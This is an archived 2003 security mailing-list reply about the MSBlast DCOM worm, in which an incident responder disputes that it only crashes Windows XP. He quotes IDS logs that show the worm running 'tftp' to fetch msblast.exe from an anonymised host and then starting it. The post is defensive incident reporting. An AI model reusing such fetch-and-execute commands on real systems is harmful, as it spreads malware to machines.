[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] DCOM Worm?

To: Carl Sager <orniter@yahoo.com>
Subject: Re: [Full-Disclosure] DCOM Worm?
From: Jordan Wiens <jwiens@nersp.nerdc.ufl.edu>
Date: Mon, 11 Aug 2003 19:29:05 -0400 (EDT)

On Mon, 11 Aug 2003, Carl Sager wrote:

> Aha!  The worm is using the 2k offsets and corrupts
> the DCOM RPC service on XP, which makes the OS
> automatically shut down after 1 minute.  Patch up or
> use a firewall (or well, just tell any ignorant end
> users to do so) and you'll be good!

You sure about that?  I'm seeing it compromise XP hosts as well.  Maybe it
randomly switches between offsets?

In fact, IDS logs from our first compromised host:

Microsoft Windows XP [Version 5.1.2600]Microsoft Windows XP [Version
5.1.2600]tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
{D}{A}
(C) Copyright 1985-2001 Microsoft Corp.{D}{A}
{D}{A}
C:\WINDOWS\System32>tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
tftp -i aaa.bbb.ccc.ddd GET msblast.exe{A}
start msblast.exe{A}
start msblast.exe{A}
msblast.exe{A}
msblast.exe{A}



-- 
Jordan Wiens, CISSP
UF Network Incident Response Team
(352)392-2061


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] DCOM Worm?
  - From: Carl Sager <orniter@yahoo.com>

References:
- [Full-Disclosure] DCOM Worm?
  - From: Carl Sager <orniter@yahoo.com>

Prev by Date: Re: [Full-Disclosure] New Windows worm?
Next by Date: Re: [Full-Disclosure] ISS Security Brief: "MS Blast" MSRPC DCOM Worm Propagation (fwd)
Prev by thread: [Full-Disclosure] DCOM Worm?
Next by thread: Re: [Full-Disclosure] DCOM Worm?
Index(es):
- Date
- Thread